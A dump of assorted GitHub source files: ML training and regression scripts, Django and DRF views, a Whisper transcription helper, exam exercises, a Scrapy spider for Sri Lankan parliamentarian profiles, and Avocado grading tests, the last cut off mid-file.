{"seq_id":"8861283415","text":"from sklearn import linear_model\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.mlab as mlab\r\nimport numpy as np\r\nimport math\r\nfrom math import *\r\n\r\nmu = 0\r\nmu2 = 0.5\r\nmu3 = 0.75\r\n\r\nvariance = 0.5\r\nvariance2 = 1\r\nvariance3 = 1.5\r\n\r\nsigma = math.sqrt(variance)\r\nsigma2 = math.sqrt(variance2)\r\nsigma3 = math.sqrt(variance3)\r\n\r\nx = np.linspace(mu-3*variance,mu+3*variance, 40)\r\nx2 = np.linspace(mu2-3*variance2, mu+3*variance2, 40)\r\nx3 = np.linspace(mu2-3*variance3, mu+3*variance3, 40)\r\n\r\nA = np.zeros((559,1))\r\nA[20:60] = mlab.normpdf(x, mu, sigma).reshape(40,1)\r\nA[230:270] = mlab.normpdf(x2, mu2, sigma2).reshape(40,1)\r\nA[420:460] = mlab.normpdf(x3, mu3, sigma3).reshape(40,1)\r\nA = A.reshape(559)\r\n\r\nB = np.zeros((559,1))\r\nB[23:63] = mlab.normpdf(x, mu, sigma).reshape(40,1)\r\nB[400:440] = mlab.normpdf(x3, mu3, sigma3).reshape(40,1)\r\nB[470:510] = mlab.normpdf(x2, mu2, sigma2).reshape(40,1)\r\nB = B.reshape(559)\r\n\r\nC = np.zeros((559, 1))\r\nC[320:360] = mlab.normpdf(x2, mu2, sigma2).reshape(40,1)\r\nC[433:473] = mlab.normpdf(x, mu, sigma).reshape(40,1)\r\nC[128:168] = mlab.normpdf(x3, mu3, sigma3).reshape(40,1)\r\nC = C.reshape(559)\r\n\r\nspectralmatrix = np.zeros((256, 256, 559))\r\nfunctionalmatrix = np.zeros((256, 256))\r\nAmatrix = np.zeros((256, 256))\r\nBmatrix = np.zeros((256, 256))\r\nCmatrix = np.zeros((256, 256))\r\nxaxis = spectralmatrix.shape[0]\r\nyaxis = spectralmatrix.shape[1]\r\n\r\n\r\n#generating random coefficients\r\n#creating a matrix with a spectrum at each point\r\n\r\nnp.random.seed(122)\r\na=np.random.rand(1)\r\nb=np.random.rand(1)\r\nc=np.random.rand(1)\r\nspatialfrequency = (2*np.pi)/64\r\nfor x in range(xaxis):\r\n for y in range(yaxis):\r\n a = abs(np.sin(y*spatialfrequency))\r\n b = abs(np.sin(x*spatialfrequency) + np.sin(y*spatialfrequency))\r\n c = np.sin(x*spatialfrequency)**2\r\n #can make a, b, c as a function of x and y with some random noise\r\n spectralmatrix[x,y,:] = a*A + b*B + c*C\r\n functionalmatrix[x][y] = 2*a + b + 9*c\r\n Amatrix[x][y]=a\r\n Bmatrix[x][y]=b\r\n Cmatrix[x][y]=c\r\n\r\n#creating a linear relationship between the three matrices\r\npts=256\r\na=Amatrix\r\nb=Bmatrix\r\nc=Cmatrix\r\nB0=0\r\nB1=2\r\nB2=1\r\nB3=9\r\nyactual=B0+B1*a+B2*b+B3*c\r\n\r\n# reshaping and concatenating the matrices for linear 
regression\r\na=a.reshape(65536,1)\r\nb=b.reshape(65536,1)\r\nc=c.reshape(65536,1)\r\nyactual=yactual.reshape(65536,1)\r\nx1=np.concatenate((a,b), axis=1)\r\nx=np.concatenate((x1,c), axis=1)\r\n\r\n#performing the linear regression and reporting the fitted coefficients\r\nregr=linear_model.LinearRegression()\r\ns=regr.fit(x, yactual)\r\nprint(s.coef_[0], s.intercept_[0])\r\n","repo_name":"kongjy/hyperAFM","sub_path":"Jessica/linear regression on synthetic data.py","file_name":"linear regression on synthetic data.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"21960381138","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@file : cmrc_trainer.py\n@author: zijun\n@contact : zijun_sun@shannonai.com\n@date : 2021/5/20 15:03\n@version: 1.0\n@desc : \n\"\"\"\nimport argparse\nimport collections\nimport json\nimport os\n\nimport pytorch_lightning as pl\nimport torch\nfrom pytorch_lightning import Trainer\nfrom pytorch_lightning.callbacks.model_checkpoint import ModelCheckpoint\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom tokenizers import BertWordPieceTokenizer\nfrom torch.utils.data.dataloader import DataLoader\nfrom transformers import AdamW, BertConfig, get_linear_schedule_with_warmup\n\nfrom datasets.cmrc_2018_dataset import CMRC2018Dataset\nfrom models.modeling_glycebert import GlyceBertForQuestionAnswering\nfrom utils.random_seed import set_random_seed\n\nset_random_seed(2333)\nRawResult = collections.namedtuple(\"RawResult\",\n [\"unique_id\", \"start_logits\", \"end_logits\"])\n\n\nclass CMRCTask(pl.LightningModule):\n\n def __init__(\n self,\n args: argparse.Namespace\n ):\n \"\"\"Initialize a model, tokenizer and config.\"\"\"\n super().__init__()\n self.args = args\n if isinstance(args, argparse.Namespace):\n self.save_hyperparameters(args)\n self.bert_dir = args.bert_path\n self.bert_config = BertConfig.from_pretrained(self.bert_dir, output_hidden_states=False)\n self.model = GlyceBertForQuestionAnswering.from_pretrained(self.bert_dir)\n self.tokenizer = BertWordPieceTokenizer(os.path.join(self.args.bert_path, \"vocab.txt\"))\n\n gpus_string = self.args.gpus if not self.args.gpus.endswith(',') else self.args.gpus[:-1]\n self.num_gpus = len(gpus_string.split(\",\"))\n self.query_map = {}\n self.result = {}\n\n def configure_optimizers(self):\n \"\"\"Prepare optimizer and schedule (linear warmup and decay)\"\"\"\n model = self.model\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],\n \"weight_decay\": self.args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)],\n \"weight_decay\": 0.0,\n },\n ]\n optimizer = AdamW(optimizer_grouped_parameters,\n betas=(0.9, 0.98), # according to RoBERTa paper\n lr=self.args.lr,\n eps=self.args.adam_epsilon)\n t_total = len(self.train_dataloader()) // self.args.accumulate_grad_batches * self.args.max_epochs\n warmup_steps = int(self.args.warmup_proporation * t_total)\n scheduler = get_linear_schedule_with_warmup(optimizer, num_warmup_steps=warmup_steps,\n num_training_steps=t_total)\n\n return [optimizer], [{\"scheduler\": scheduler, \"interval\": \"step\"}]\n\n def compute_loss_and_acc(self, batch):\n input_ids, pinyin_ids, input_mask, span_mask, segment_ids, start, end = batch\n batch_size, length = input_ids.shape\n pinyin_ids = pinyin_ids.view(batch_size, length, 
8)\n # attention mask\n attention_mask = (input_ids != 0).long()\n output = self.model(input_ids, pinyin_ids, attention_mask=attention_mask,\n token_type_ids=segment_ids, start_positions=start, end_positions=end)\n return output\n\n def training_step(self, batch, batch_idx):\n \"\"\"\"\"\"\n output = self.compute_loss_and_acc(batch)\n loss = output[0]\n tf_board_logs = {\n \"train_loss\": loss,\n \"lr\": self.trainer.optimizers[0].param_groups[0]['lr']\n }\n return {'loss': loss, 'log': tf_board_logs}\n\n def validation_step(self, batch, batch_idx):\n \"\"\"\"\"\"\n output = self.compute_loss_and_acc(batch)\n loss = output[0]\n return {'val_loss': loss}\n\n def validation_epoch_end(self, outputs):\n \"\"\"\"\"\"\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n tensorboard_logs = {'val_loss': avg_loss}\n print(avg_loss)\n return {'val_loss': avg_loss, 'log': tensorboard_logs}\n\n def train_dataloader(self) -> DataLoader:\n return self.get_dataloader(\"train\")\n\n def val_dataloader(self):\n return self.get_dataloader(\"dev\")\n\n def get_dataloader(self, prefix=\"train\") -> DataLoader:\n \"\"\"get training dataloader\"\"\"\n dataset = CMRC2018Dataset(directory=self.args.data_dir, prefix=prefix)\n dataloader = DataLoader(\n dataset=dataset,\n batch_size=self.args.batch_size,\n num_workers=self.args.workers,\n shuffle=True\n )\n return dataloader\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=\"Training\")\n parser.add_argument(\"--bert_path\", required=True, type=str, help=\"bert config file\")\n parser.add_argument(\"--batch_size\", type=int, default=8, help=\"batch size\")\n parser.add_argument(\"--lr\", type=float, default=3e-5, help=\"learning rate\")\n parser.add_argument(\"--workers\", type=int, default=4, help=\"num workers for dataloader\")\n parser.add_argument(\"--weight_decay\", default=0.0, type=float, help=\"Weight decay if we apply some.\")\n parser.add_argument(\"--adam_epsilon\", default=1e-8, type=float, help=\"Epsilon for Adam optimizer.\")\n parser.add_argument(\"--warmup_steps\", default=0, type=int, help=\"warmup steps\")\n parser.add_argument(\"--use_memory\", action=\"store_true\", help=\"load datasets to memory to accelerate.\")\n parser.add_argument(\"--max_length\", default=512, type=int, help=\"max length of datasets\")\n parser.add_argument(\"--data_dir\", required=True, type=str, help=\"train data path\")\n parser.add_argument(\"--save_path\", required=True, type=str, help=\"train data path\")\n parser.add_argument(\"--save_topk\", default=1, type=int, help=\"save topk checkpoint\")\n parser.add_argument(\"--warmup_proporation\", default=0.01, type=float, help=\"warmup proporation\")\n return parser\n\n\ndef main():\n \"\"\"main\"\"\"\n parser = get_parser()\n parser = Trainer.add_argparse_args(parser)\n args = parser.parse_args()\n\n if not os.path.exists(args.save_path):\n os.mkdir(args.save_path)\n\n model = CMRCTask(args)\n\n checkpoint_callback = ModelCheckpoint(\n filepath=os.path.join(args.save_path, 'checkpoint', '{epoch}-{val_loss:.4f}'),\n save_top_k=args.save_topk,\n save_last=False,\n monitor=\"val_loss\",\n mode=\"min\",\n )\n logger = TensorBoardLogger(\n save_dir=args.save_path,\n name='log'\n )\n\n # save args\n with open(os.path.join(args.save_path, 'checkpoint', \"args.json\"), 'w') as f:\n args_dict = args.__dict__\n del args_dict['tpu_cores']\n json.dump(args_dict, f, indent=4)\n\n trainer = Trainer.from_argparse_args(args,\n checkpoint_callback=checkpoint_callback,\n distributed_backend=\"ddp\",\n 
logger=logger)\n\n trainer.fit(model)\n\n\nif __name__ == '__main__':\n from multiprocessing import freeze_support\n\n freeze_support()\n main()\n","repo_name":"ShannonAI/ChineseBert","sub_path":"tasks/CMRC/cmrc_trainer.py","file_name":"cmrc_trainer.py","file_ext":"py","file_size_in_byte":7324,"program_lang":"python","lang":"en","doc_type":"code","stars":505,"dataset":"github-code","pt":"47"}
{"seq_id":"23862835067","text":"#!/bin/python\n\nfrom itertools import permutations\nfrom copy import copy\nimport networkx as nx\n\nclass Downscaler():\n def __init__( self, emu_nodes, graph):\n self.emu_nodes = emu_nodes \n self.graph = graph\n \n self.paths = []\n self.get_paths()\n\n def get_paths( self ):\n for flow in self.emu_nodes:\n path = nx.shortest_path( self.graph, flow['src'], flow['dest'] )\n\n node_types = nx.get_node_attributes( self.graph, 'type' )\n for p in path:\n if node_types.get( p ) != 'interface':\n path.remove( p )\n \n path1 = path[0:][::2]\n path2 = path[1:][::2]\n path2.reverse()\n \n path1id = int( flow['id'] )\n path2id = path1id + 1\n \n self.paths.append( {'id': path1id, 'path': path1} )\n self.paths.append( {'id': path2id, 'path': path2} )\n\n return self.paths\n\n def get_pipes( self ):\n pipes = []\n\n path_perms = []\n for path in self.paths:\n path_perms.append( set( path['path'] ) )\n\n intersections = []\n for p in permutations( path_perms, 2 ):\n temp = set( p[0] ) & set( p[1] )\n if len( temp ) != 0:\n try:\n intersections.index( temp )\n except ValueError:\n intersections.append( temp )\n pipes.append( temp )\n\n for path in self.paths:\n for inter in intersections:\n temp = set( path['path'] ) - inter\n if len( temp ) != 0 and temp != set( path['path'] ):\n try:\n pipes.index( temp )\n except ValueError:\n pipes.append( temp )\n\n if len( pipes ) == 0:\n pipes = copy( path_perms ) \n\n i = 0\n for i in range( len( pipes ) ):\n pipes[i] = list( pipes[i] )\n\n return pipes\n","repo_name":"IAmMadSlave/conflux-mininet","sub_path":"symbiosim-study/src/final/src/Downscaler.py","file_name":"Downscaler.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"42638365327","text":"from django.shortcuts import get_object_or_404, render\n\nfrom core.models import CarouselImage\n\nfrom .models import Bicycle, Brand\n\n\ndef all_brands(request):\n brand_list = []\n carousel_list = []\n\n bbrand_query = Brand.objects.all()\n carousel_query = CarouselImage.objects.all()\n for brd in bbrand_query:\n brand_list.append(brd)\n for car in carousel_query:\n carousel_list.append(car)\n context = {\n 'brand_query': brand_list,\n 'carousel_query': carousel_list\n }\n\n return render(request, 'collection/brand.html', context)\n\n\ndef brand_detail(request, slug):\n\n bike_query = None\n\n try:\n brand = get_object_or_404(Brand, slug=slug)\n except Exception:\n brand = False\n\n if brand:\n bike_query = brand.bicycle_set.all()\n\n context = {\n 'brand_obj': brand,\n 'bike_query': bike_query,\n 'brand_slug': slug,\n }\n\n return render(request, 'collection/brand_detail.html', context)\n\n\ndef bike_detail(request, bikeslug, brandslug=None):\n\n bike_photo_query = None\n\n try:\n bike = get_object_or_404(Bicycle, slug=bikeslug)\n except Exception:\n bike = False\n\n if bike:\n bike_photo_query = bike.photo_set.all()\n\n context = {\n 'bikeslug': 
bikeslug,\n 'bike': bike,\n 'bike_photos': bike_photo_query,\n }\n\n return render(request, 'collection/bike_detail.html', context)\n\ndef slider_mobile(request):\n return render(request, 'collection/slider.html')","repo_name":"brunodutraa/vintage_bicycle_collection","sub_path":"collection/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43514283055","text":"\nimport whisper\nimport sys\n\nmodel = whisper.load_model(\"tiny.en\")\n\n# for only english\ndef transcribe(au_path) :\n \n result = model.transcribe(au_path)\n \n return result[\"text\"]\n\n# for all lang\ndef transcribe_mul_lang(au_path):\n model = whisper.load_model(\"base\")\n\n # load audio and pad/trim it to fit 30 seconds\n audio = whisper.load_audio(au_path)\n audio = whisper.pad_or_trim(audio)\n\n # make log-Mel spectrogram and move to the same device as the model\n mel = whisper.log_mel_spectrogram(audio).to(model.device)\n\n # detect the spoken language\n _, probs = model.detect_language(mel)\n print(f\"Detected language: {max(probs, key=probs.get)}\")\n\n # decode the audio\n options = whisper.DecodingOptions()\n result = whisper.decode(model, mel, options)\n\n # print the recognized text\n return result.text\n\n\n\ndef reg(au_path , type=\"none\"):\n if type==\"none\":\n res = transcribe(au_path)\n elif type==\"mul\":\n res = transcribe_mul_lang(au_path)\n return res\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n au_path = sys.argv[1]\n print(\"input audio path :\", au_path)\n else:\n au_path = input(\"Enter audio path : \")\n print(\"input audio path :\", au_path)\n pmt = transcribe(au_path)\n print(pmt)\n \n\n\n \n\n\n\n\n\n\n\n \n \n\n","repo_name":"Lokeshwaran-M/lok-lib","sub_path":"loklib/speech_reg.py","file_name":"speech_reg.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"35907248202","text":"import os\n\nfrom torch.utils.data import Dataset\nfrom torchvision.datasets.folder import default_loader\n\nfrom uvcgan2.consts import SPLIT_TRAIN\nfrom .image_domain_folder import ImageDomainFolder\n\nclass ImageDomainHierarchy(Dataset):\n\n def __init__(\n self, path, domain,\n split = SPLIT_TRAIN,\n transform = None,\n **kwargs\n ):\n super().__init__(**kwargs)\n\n self._path = os.path.join(path, split, domain)\n self._imgs = ImageDomainFolder.find_images_in_dir(self._path)\n self._transform = transform\n\n def __len__(self):\n return len(self._imgs)\n\n def __getitem__(self, index):\n path = self._imgs[index]\n result = default_loader(path)\n\n if self._transform is not None:\n result = self._transform(result)\n\n return result\n\n","repo_name":"KayceeSamuel/uvcGAN2_custom","sub_path":"uvcgan2-main/uvcgan2/data/datasets/image_domain_hierarchy.py","file_name":"image_domain_hierarchy.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"16300575319","text":"# The main code to test the methods of Queue functionality\n\n\nimport lineards\n\nif __name__ == '__main__':\n obj_Q = lineards.Queue()\n \n while True:\n inp = input(\"Press 0: exit, 1: Enqueue, 2: Dequeue, 3: Is empty ?, 4: Queue size ? 
:\")\n\n if(int(inp) == 0):\n break\n elif(int(inp) == 1):\n num = input(\"Enter no to Enqueue : \")\n obj_Q.enqueue(int(num))\n elif(int(inp) == 2):\n item = obj_Q.dequeue()\n print(\"Item dequeued : \" + str(item))\n elif(int(inp)==3):\n if obj_Q.isEmpty():\n print(\"Queue is empty\")\n else:\n print(\"Queue not empty\")\n elif(int(inp) == 4):\n print(\"Queue Size : \", obj_Q.size()) \n else:\n inp = input(\"Press 0: exit, 1: Enqueue, 2: Dequeue, 3: Is empty ?, 4: Queue size ? :\")","repo_name":"anjanikeshari/dsalgo","sub_path":"testQueue.py","file_name":"testQueue.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"7922150763","text":"import scrapy\nimport json \nimport re\n\nclass MinisterScrape(scrapy.Spider):\n name = \"ministers\"\n objects = []\n minister_name = \"\"\n position = \"\"\n party = \"\"\n district = \"\"\n contact_information = []\n related_subjects = []\n participated_in_parliament = \"\"\n overall_rank = \"\"\n biography = \"\"\n idx = -1\n\n allowed_domains= [\n 'manthri.lk'\n ]\n\n \n def start_requests(self):\n urls = [\n \"http://www.manthri.lk/si/politicians\",\n ]\n base = \"http://www.manthri.lk/si/politicians?page=\"\n for i in range(2,10):\n urls.append(base+str(i))\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n print(url)\n \n \n\n def parse(self, response):\n\n for quote in response.xpath('/html/body/div[2]/div/div[1]/ul[1]/li/h4/a/@href').getall():\n quote = \"http://www.manthri.lk/\"+quote\n related_subjects_l = []\n yield scrapy.Request(quote, callback=self.details_extractor,cb_kwargs=dict(related_subjects_l = related_subjects_l))\n \n def details_extractor(self, response, related_subjects_l):\n t = response.xpath('/html/body/div[2]/div/div/div[1]/div[6]/table')\n if len(t) == 0:\n related_subjects_l = []\n load_more = None\n else:\n table = response.xpath('/html/body/div[2]/div/div/div[1]/div[6]/table')[0]\n for subject in table.xpath('//tbody/tr/td[3]/ul/li/a/text()').getall():\n related_subjects_l.append(subject)\n load_more = response.xpath('/html/body/div[2]/div/div/div[1]/div[6]/div/a/@href').get()\n if load_more is not None:\n load_more = \"http://www.manthri.lk/\" + load_more\n yield scrapy.Request(load_more, callback=self.details_extractor,cb_kwargs=dict(related_subjects_l = related_subjects_l))\n else:\n self.idx += 1\n self.related_subjects = list(set(related_subjects_l))\n self.minister_name= response.xpath('/html/body/div[2]/section/div/div/div[2]/h1/text()').get().strip().replace(\" \", \" \")\n p = response.xpath('/html/body/div[2]/section/div/div/div[2]/p/text()').get()\n if p is not None:\n self.position=\" , \".join(response.xpath('/html/body/div[2]/section/div/div/div[2]/p/text()').get().strip().split(\"-\"))\n else:\n self.position= \"පාර්ලිමේන්තු මන්ත්‍රී\"\n self.party = response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[1]/text()[1]').get().strip().split(\",\")[0]\n self.district = response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[1]/a/text()').get().strip()\n contact_l = []\n contact_l.append(response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[2]/span[1]/text()').get().strip())\n if response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[2]/span[2]/a/text()').get() is not None:\n contact_l.append(response.xpath('/html/body/div[2]/section/div/div/div[2]/div/p[2]/span[2]/a/text()').get().strip())\n self.contact_information = contact_l\n\n self.overall_rank= 
response.xpath('/html/body/div[2]/div/div/div[1]/div[2]/div[1]/span/strong/text()').get().strip()[1:]\n self.participated_in_parliament = response.xpath('/html/body/div[2]/div/div/div[1]/div[2]/div[3]/span/strong/text()').get().strip()\n\n bio_string = \"\"\n \n table_personal = response.xpath('/html/body/div[2]/div/div/div[1]/div[8]/table[1]/tbody/tr')\n for i in range(len(table_personal)-1,-1,-1):\n key = table_personal[i].xpath('./td[1]/text()').get().strip()\n value = table_personal[i].xpath('./td[2]/text()').get().strip()\n if key == \"ස්ත්‍රී පුරුෂ භාවය:\":\n gender = value\n if \"හිමි\" in self.minister_name:\n pro_noune1 = \"\"\n pro_noune2 = \"උන්වහන්සේ \"\n if gender == \"පුරුෂ\" or gender == \"පිරිමි\" or gender == \"male\":\n pro_noune1 = \"මහතා\"\n pro_noune2 = \"මෙතුමා \"\n elif gender == \"ස්ත්‍රී\" or gender == \"ගැහැණු\" or gender == \"female\":\n pro_noune1 = \"මහත්මිය\"\n pro_noune2 = \"මෙතුමිය \" \n elif key == \"උපන්දිනය:\" and value is not None:\n birthday = value\n birthday_string = self.minister_name + \" \"+ pro_noune1 + \" \" + birthday + \" \" + \"දින උපත ලබා ඇත.\" \n bio_string += birthday_string\n\n table_edu = response.xpath('/html/body/div[2]/div/div/div[1]/div[8]/table[2]/tbody/tr')\n schools = \"\"\n edu_string = \"\"\n for i in range(len(table_edu)):\n key = table_edu[i].xpath('./td[1]/text()').get()\n value = table_edu[i].xpath('./td[2]/text()').get()\n if value is None:\n continue\n else:\n if \"පාසැල\" in key:\n if edu_string == \"\": \n schools += value\n edu_string = pro_noune2 + schools + \" යන පාසලේ අධ්යාපනය ලබා ඇත.\"\n else:\n schools += \"; \"+value+\"; \"\n edu_string = pro_noune2 + schools + \" යන පාසල්වල අධ්යාපනය ලබා ඇත.\"\n elif \"ප්‍රථම උපාධිය\" in key:\n edu_string += \"තම ප්‍රථම උපාධිය \"+value+\" ලබාගෙන ඇත.\"\n elif \"පශ්චාත් උපාධිය\" in key:\n edu_string += \" ඊට අමතරව \"+ value +\" පශ්චාත් උපාධිය ද සම්පූර්ණ කර ඇත.\"\n \n bio_string += edu_string\n\n table_party = response.xpath('/html/body/div[2]/div/div/div[1]/div[8]/table[3]/tbody/tr')\n party_string = \"\" \n j = \"\" \n for i in range(len(table_party)):\n if i>0:\n j = \"ද\"\n if i == 1:\n party_string+=j+\" \"\n duration = table_party[i].xpath('./td[1]/text()').get()\n party = table_party[i].xpath('./td[2]').get().split(\">\")[-2].split(\",\")[0].strip()\n if duration is not None and party is not None:\n if \"සිට\" not in duration:\n try:\n start,end = duration.split(\" - \")\n party_string += start+\" සිට \"+end+\" දක්වා \"+party+j\n except:\n party_string += duration+\" පටන්\"+party+j\n else:\n party_string += duration+\" \"+party+j\n party_string += \" නියෝජනය කරමින් පාර්ලිමේන්තුවේ අසුන් ගෙන සිටී.\"\n\n bio_string += party_string\n\n self.biography = bio_string\n\n details= {\n 'name' : self.minister_name ,\n 'position' : self.position ,\n 'party' : self.party , \n 'district' : self.district ,\n 'contact_information' : self.contact_information ,\n 'overall_rank' : self.overall_rank ,\n 'participated_in_parliament' : self.participated_in_parliament ,\n 'related_subjects' : self.related_subjects,\n 'biography' : self.biography\n }\n\n with open(\"data/\"+str(self.idx)+\".json\", 'w', encoding=\"utf8\") as outfile:\n json.dump([details], outfile,indent = 4,ensure_ascii=False)\n self.objects.append(details)\n \n \n def closed(self, reason):\n with open(\"data.json\", 'w', encoding=\"utf8\") as outfile:\n json.dump(self.objects, outfile,indent = 
4,ensure_ascii=False)","repo_name":"Thisun1997/Web-Scraper","sub_path":"crawler/spiders/ministers.py","file_name":"ministers.py","file_ext":"py","file_size_in_byte":8024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"11792971917","text":"# @Time : 2020/06/09\n# @Author : sunyingqiang\n# @Email : 344670075@qq.com\nfrom rest_framework.viewsets import GenericViewSet\nfrom rest_framework import mixins\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom Apps.User.serializers.user_address_serializers import UserAddressSerializer\nfrom Apps.User.models import Address\nfrom drf_shop import contants\n\n\nclass UserAddressViewSet(mixins.ListModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n GenericViewSet):\n \"\"\"User address viewset.\"\"\"\n\n serializer_class = UserAddressSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n return self.request.user.addresses.filter(is_deleted=False)\n\n\n def list(self, request, *args, **kwargs):\n \"\"\"List the user's addresses.\"\"\"\n queryset = self.get_queryset()\n serializer = self.get_serializer(queryset, many=True)\n user = self.request.user\n return Response({\n 'user_id': user.id,\n 'default_address_id': user.default_address_id,\n 'limit': contants.USER_ADDRESS_COUNTS_LIMIT,\n 'addresses': serializer.data\n })\n\n\n def create(self, request, *args, **kwargs):\n \"\"\"Create a user address.\"\"\"\n count = request.user.addresses.count()\n if count >= contants.USER_ADDRESS_COUNTS_LIMIT:\n return Response({'message': 'The number of saved addresses has reached the limit'}, status.HTTP_400_BAD_REQUEST)\n\n return super().create(request, *args, **kwargs)\n\n\n def destroy(self, request, *args, **kwargs):\n \"\"\"Delete an address (soft delete).\"\"\"\n address = self.get_object()\n address.is_deleted = True\n address.save()\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\n @action(methods=['put'], detail=True)\n def status(self, request, pk=None):\n \"\"\"Set the default address. url:/api/user/address//status/\"\"\"\n address = self.get_object()\n request.user.default_address = address\n request.user.save()\n return Response({'message': 'OK'}, status=status.HTTP_200_OK)\n\n\n @action(methods=['put'], detail=True)\n def title(self, request, pk=None):\n \"\"\"Update the address title. url:/api/user/address//title/\"\"\"\n address = self.get_object()\n serializer = UserAddressSerializer(instance=address, data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data)\n","repo_name":"supermouse123/drf_api","sub_path":"drf_shop/Apps/User/views/user_address.py","file_name":"user_address.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"47"}
{"seq_id":"4699350387","text":"start = 1634515200\nend = start + 7 * 24 * 60 * 60\n\nwith open('26(1).txt', 'r') as f:\n all_vals = [[max(int(i.split()[0]), start), min(int(i.split()[1]), end)] for i in f if len(i.split()) > 1]\n\nstarts = []\nends = []\nfor i in range(len(all_vals)):\n if all_vals[i][1] == 0:\n ends.append(end)\n else:\n ends.append(all_vals[i][1])\n\n starts.append(all_vals[i][0])\nc = 0\nres = []\nmax_val = 0\ntimer = 0\nmax_time = 0\nfor i in range(start, end):\n c += starts.count(i)\n c -= ends.count(i)\n if c == max_val:\n timer += 1\n elif c > max_val:\n timer = 1\n max_time = max(max_time, timer)\n max_val = max(c, max_val)\n\nprint(max_val, 
max_time)\n","repo_name":"benzlokzik/ege-oge-ikt-informatics","sub_path":"unsorted 2022 and older files/ege_2022/15.06.2022/26.41001.py","file_name":"26.41001.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29234423436","text":"n, k = map(int, input().split())\nisPrimeList = [False, False] + [True] * (n - 1)\n\ncnt = 0\nfor i in range(2, n + 1):\n for j in range(i, n + 1, i):\n if isPrimeList[j]:\n cnt += 1\n if cnt == k:\n print(j)\n exit(0)\n isPrimeList[j] = False\n","repo_name":"codingNoob12/algorithm-study","sub_path":"BOJ/silver4/2023-02-16/2960.py","file_name":"2960.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"12625959938","text":"import Util\n\nimport os\nimport shutil\n\nfrom avocado.utils import archive, build, process\n\nfrom avocado import Test\n\nclass SetUpNoTar(Util.GuacTest): \n\n\n def test_clear_work(self):\n self._guac_handler(self._test_clear_work)\n \n def _test_clear_work(self):\n \"\"\"\n :param HOME: test directory\n \"\"\"\n desc={\"Description\":\"Clearing working directory\"}\n self._write_whiteboard_yaml(desc)\n #\n home = self._safe_param(\"HOME\")\n work = Util.get_work_dir(home)\n\n shutil.rmtree(work)\n os.makedirs(work)\n #\n\n def test_file_exists(self):\n self._guac_handler(self._test_file_exists)\n \n def _test_file_exists(self):\n \"\"\"\n :avocado: tags=tar_exists \n :param STUDENT\n :param HOME\n :param ASSIGNMENT\n \"\"\"\n \n desc={\"Description\":\"Testing submission exists\"}\n self._write_whiteboard_yaml(desc)\n\n file_loc = self._file_location()\n #\n \n file_desc={\"Message\":f\"Grading {os.path.basename(file_loc)}\"}\n # \"Contents\":Util.list_tar_contents(tar_loc)}\n self._write_whiteboard_yaml(file_desc)\n \n #\n\n def test_copy_file(self):\n self._guac_handler(self._test_copy_file)\n \n def _test_copy_file(self):\n \"\"\"\n :avocado: tags=extract_tar\n :param STUDENT\n :param HOME\n :param ASSIGNMENT\n :param FILE_TYPE\n :param FILE_NAME\n \"\"\"\n \n # the config var FILE_NAME is the name the file should have in work\n # the (optional) env var FILE_NAME is the file to use for grading in ~/Checkin/{ASSIGNMENT}/{STUDENT}/\n\n desc={\"Description\":\"Moving submission to working directory\"}\n self._write_whiteboard_yaml(desc)\n #\n work=Util.get_work_dir(self._safe_param(\"HOME\"))\n file_loc=self._file_location()\n file_name=self._safe_param(\"FILE_NAME\")\n shutil.copy(file_loc,os.path.join(work,file_name))\n\n # not the best, should find a better solution, or a better standard\n #assignment_dir=os.path.join(work,self._safe_param(\"ASSIGNMENT\"))\n #if os.path.isdir(assignment_dir):\n # for el in os.listdir(assignment_dir):\n # shutil.move(os.path.join(assignment_dir,el),os.path.join(work,el))\n \n #\n\n\n def test_copy_lib_contents(self):\n self._guac_handler(self._test_copy_lib_contents)\n \n def _test_copy_lib_contents(self):\n \"\"\"\n :param STUDENT\n :param HOME\n :param ASSIGNMENT\n :param LIB_CONTENTS\n \"\"\"\n \n lib_contents=self.params.get(\"LIB_CONTENTS\",default=[])\n desc={\"Description\":\"Copying 